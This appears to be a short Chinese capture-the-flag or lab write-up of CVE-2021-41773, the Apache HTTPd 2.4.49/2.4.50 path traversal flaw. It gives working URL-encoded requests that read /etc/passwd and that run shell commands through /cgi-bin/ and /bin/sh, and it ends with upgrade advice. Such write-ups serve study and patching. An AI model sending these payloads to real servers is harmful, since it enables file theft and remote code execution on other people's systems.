Apache HTTPd 是Apache基金会开源的一款HTTP服务器。2021年10月8日Apache HTTPd官方发布安全更新,披露CVE-2021-41773 Apache HTTPd 2.4.49 路径穿越漏洞。攻击者利用这个漏洞,可以读取到Apache服务器web目录以外的其他文件,或读取web中的脚本源码,如果服务器开启CGI或cgid服务,攻击者可进行任意代码执行。
Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞
cgi mode2.4.49/2.4.50cgi-bin和icons文件夹穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>。(默认情况下是不允许的:<Directory />Require all denied</Directory>)
注意:这里的/icons/必须是一个存在且可访问的目录
GET /icons/../../../../etc/passwd HTTP/1.1
失败!对路径..进行url转码,拼接修改后添加:GET /icons/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1,成功回显路径,说明存在漏洞。
cgi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意命令,修改请求头:POST /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1,请求体添加echo; ls /,成功回显目录。
echo;ls /tmp 获取flag升级到最新版的Apache HTTP Server 安全版本。
